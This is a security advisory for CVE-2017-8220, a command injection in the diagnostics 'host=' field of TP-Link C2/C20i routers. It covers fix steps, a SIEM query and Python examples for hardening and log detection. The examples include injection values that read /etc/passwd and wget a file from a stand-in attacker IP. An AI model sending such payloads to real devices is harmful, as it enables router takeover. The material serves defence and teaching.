CVE-2017-8220

9.9 CRITICAL

📋 TL;DR

This vulnerability lets a remote attacker execute arbitrary commands on TP-Link C2 and C20i routers by sending a crafted HTTP POST request to the web management interface with shell metacharacters (for example `;`, `|` or backticks) in the `host=` parameter of the diagnostics (ping/traceroute) function. The value is passed to a shell without validation, so everything after the metacharacter runs on the device. All users of these devices on vulnerable firmware are affected, and successful exploitation gives the attacker full control of the router.

💻 Affected Systems

Products:
  • TP-Link C2
  • TP-Link C20i
Versions: Firmware up to and including 0.9.1 4.2 v0032.0 Build 160706 Rel.37961n
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: All devices with vulnerable firmware are affected regardless of configuration.

📦 What is this software?

The TP-Link C2 (Archer C2) and C20i (Archer C20i) are AC750 dual-band consumer wireless routers. Administration, including the diagnostics page that contains the vulnerable `host=` handler, is done through an embedded HTTP management interface on the router itself.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete device takeover allowing installation of persistent malware, network pivoting, data theft, and participation in botnets.

🟠 Likely Case

Device compromise leading to credential theft, network surveillance, and use as an attack platform.

🟢 If Mitigated

Limited impact if the management interface is unreachable from the internet and the device sits behind firewalls with strict inbound filtering and network segmentation; note that perimeter filtering does nothing for an attacker already on the LAN.

🌐 Internet-Facing: HIGH - Devices whose web management interface is reachable from the internet (remote management enabled, or the UI port-forwarded) can be attacked directly; the only remaining bar is the admin login, which is trivial if the default password was never changed.
🏢 Internal Only: MEDIUM - Internal attackers, or malware on a LAN client (including a malicious web page driving the victim's browser), could exploit this for persistence and lateral movement.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: No - the injection is reached through the authenticated web management interface (the 9.9 score's PR:L reflects this); default or weak admin credentials make it effectively unauthenticated in practice.
Complexity: LOW

Once a management session exists, a single HTTP POST with shell metacharacters in the `host=` field is sufficient; the injected command runs with the privileges of the web server process, which on this class of embedded device is root.
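To make the injection class concrete, here is an added example (not the TP-Link firmware's code, which is closed-source C): a minimal Python model of a diagnostics handler that turns the `host=` form field into a ping command line. The exact command shape (`ping -c 4 <host>`) is an assumption. The vulnerable variant concatenates the raw value into a string destined for a shell; the hardened variant validates the value as an IP address or RFC 1123 hostname and passes it as a separate argv element so no shell ever parses it.

```python
import ipaddress
import re

# Added example (not TP-Link's code): a minimal model of the pattern behind
# CVE-2017-8220, a diagnostics handler that turns the host= form field into a
# ping command. The vulnerable version builds a shell string; the hardened
# version validates the value and builds an argv list for exec without a shell.

# RFC 1123 hostname: labels of letters, digits and hyphens that neither start
# nor end with a hyphen, joined by dots, at most 253 characters in total.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def is_valid_host(value: str) -> bool:
    """Accept only an IPv4/IPv6 literal or an RFC 1123 hostname."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.fullmatch(value) is not None


def vulnerable_command(host: str) -> str:
    """Vulnerable pattern: the raw parameter is pasted into a command line that
    would be handed to system()/popen(), so ';', '|', '`' and '$()' are
    interpreted by the shell."""
    return f"ping -c 4 {host}"


def hardened_argv(host: str) -> list[str]:
    """Hardened pattern: reject anything that is not a host, then pass the value
    as its own argv element so no shell parses it. The validator also rejects a
    leading '-', so the value cannot be read by ping as an option."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "4", host]


def shell_commands(cmdline: str) -> list[str]:
    """Roughly how a POSIX shell cuts a command line at ';' (simplified: ignores
    quoting), to show what an injected value would actually execute."""
    return [part.strip() for part in cmdline.split(";") if part.strip()]


if __name__ == "__main__":
    # Constructed values: a benign target and one carrying a ';' separator
    # (what host=8.8.8.8%3Bcat+%2Fetc%2Fpasswd decodes to in a POST body).
    for value in ("8.8.8.8", "8.8.8.8;cat /etc/passwd"):
        print("vulnerable would run:", shell_commands(vulnerable_command(value)))
        try:
            print("hardened argv:      ", hardened_argv(value))
        except ValueError as exc:
            print("hardened:           ", exc)
```

The point of the hardened variant is that validation and the exec-without-shell call reinforce each other: even if the allowlist were loosened, an argv element is never re-parsed for metacharacters, and even if a shell were used, the allowlist leaves nothing for it to interpret.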

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Firmware versions after 0.9.1 4.2 v0032.0 Build 160706 Rel.37961n

Vendor Advisory: https://www.tp-link.com/us/support/download/c2/#Firmware

Restart Required: Yes

Instructions:

1. Download the latest firmware for your model from the TP-Link website, choosing the file that matches the hardware version printed on the device label (flashing an image for the wrong hardware version can brick the router).
2. Log into the device web interface.
3. Navigate to System Tools > Firmware Upgrade.
4. Upload the firmware file.
5. Wait for the automatic reboot, then confirm the new version string is shown on the same page.

🔧 Temporary Workarounds

Network Access Control (all platforms)

Block external access to the device management interface: disable remote management and remove any WAN-side port forward to the web UI.

Firewall Rules (all platforms)

Restrict HTTP/HTTPS access to the device to trusted networks only; keep the management interface unreachable from guest and IoT segments.

🧯 If You Can't Patch

  • Isolate affected devices in a separate VLAN with strict access controls, and reach the management interface only from an administrative host.
  • Change the default admin password; the injection is reached through an authenticated session, so credentials are the last line of defence.
  • Implement network monitoring (reverse proxy or IDS in front of the device) for POST requests to the management interface whose `host=` field contains shell metacharacters.

🔍 How to Verify

Check if Vulnerable:

Check the firmware version in the device web interface under System Tools > Firmware Upgrade; any version up to and including 0.9.1 4.2 v0032.0 Build 160706 Rel.37961n is vulnerable.

Check Version:

curl -s http://device-ip/ | grep -i firmware

Note that the unauthenticated login page usually does not carry the version string, so this command may return nothing on a vulnerable device; an empty result is not evidence that the device is patched. The web UI after login is authoritative.

Verify Fix Applied:

Verify that the firmware version shown under System Tools > Firmware Upgrade is newer than 0.9.1 4.2 v0032.0 Build 160706 Rel.37961n, and confirm that remote management is still disabled after the upgrade (some upgrades reset settings).

📡 Detection & Monitoring

Log Indicators:

  • HTTP POST requests to the management interface whose `host=` parameter contains shell metacharacters (`;`, `|`, `&`, backtick, `$(`) or their URL-encoded forms (`%3B`, `%7C`, `%26`, `%60`, `%24%28`)
  • Unusual child processes of the web server (wget, nc, sh with inline commands) if the device exposes any process or syslog output
  • The router itself does not log POST bodies, so these indicators have to come from a reverse proxy, IDS or packet capture placed in front of it.

Network Indicators:

  • HTTP requests to the device management interface with command injection patterns in form fields
  • Outbound connections from the router to suspicious IPs, in particular HTTP/TFTP downloads shortly after a POST to the management interface (second-stage payload retrieval)

SIEM Query:

source="proxy_logs" method=POST uri="*/cgi*" form_body="*host=*" AND (form_body="*;*" OR form_body="*%3B*" OR form_body="*|*" OR form_body="*%7C*" OR form_body="*`*" OR form_body="*%60*" OR form_body="*$(*" OR form_body="*%24%28*")

`source`, `uri` and `form_body` are placeholder field names; map them to whatever your proxy or IDS logs use for the request body. Do not match on bare words like `sh`: they occur in legitimate values and miss payloads that only use metacharacters. A legitimate `host=` value is an IP address or hostname, so any shell metacharacter in it is a reliable signal.
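The same detection logic as a script, run over constructed log lines; this is an added example, not part of the original page or any vendor tooling. The log format (timestamp, client, method, path, quoted URL-encoded POST body) and the `/cgi` path are assumptions made for the example; adapt the line parser to what your reverse proxy or IDS actually records. Because the router does not log request bodies itself, this has to run on proxy or packet-capture data placed in front of the device.

```python
import re
from urllib.parse import parse_qs

# Added example (not from the original page): scan request logs for the
# CVE-2017-8220 injection pattern, a host= form field carrying shell
# metacharacters. Log format and paths below are constructed for the example.

# Constructed sample: one benign ping, two injection attempts from an external
# address (URL-encoded ';' and backticks), a GET, and a benign hostname.
SAMPLE_LOG = """\
2017-04-18T10:02:11Z 192.168.0.23 POST /cgi "host=8.8.8.8&count=4"
2017-04-18T10:02:19Z 203.0.113.7 POST /cgi "host=8.8.8.8%3Bcat+%2Fetc%2Fpasswd&count=4"
2017-04-18T10:03:02Z 203.0.113.7 POST /cgi "host=%60wget+http%3A%2F%2F203.0.113.7%2Fx%60&count=4"
2017-04-18T10:03:40Z 192.168.0.5 GET /login ""
2017-04-18T10:04:01Z 192.168.0.23 POST /cgi "host=my-printer.lan&count=4"
"""

# timestamp client method path "body"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')

# Characters a POSIX shell treats specially; none of them can appear in a
# legitimate IP address or hostname, so one hit is enough to flag the request.
SHELL_META_RE = re.compile(r"[;|&`$()<>\n\r]")


def host_values(body: str) -> list[str]:
    """Decode the form body and return every host= value, URL-decoded."""
    return parse_qs(body, keep_blank_values=True).get("host", [])


def suspicious_hosts(log_text: str) -> list[dict]:
    """Return one finding per POST whose host= field contains shell metacharacters."""
    findings = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # not in the expected format; skip rather than guess
        ts, client, method, path, body = match.groups()
        if method != "POST":
            continue
        for host in host_values(body):
            if SHELL_META_RE.search(host):
                findings.append({"time": ts, "client": client, "path": path, "host": host})
    return findings


if __name__ == "__main__":
    for finding in suspicious_hosts(SAMPLE_LOG):
        print(f"{finding['time']} {finding['client']} {finding['path']} host={finding['host']!r}")
```

Decoding the body before matching matters: an attacker can hide `;` as `%3B` or split the payload across encodings, and a pattern applied to the raw body will miss it. Matching on the decoded `host=` value alone also keeps the false-positive rate down, since other fields may legitimately contain punctuation.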
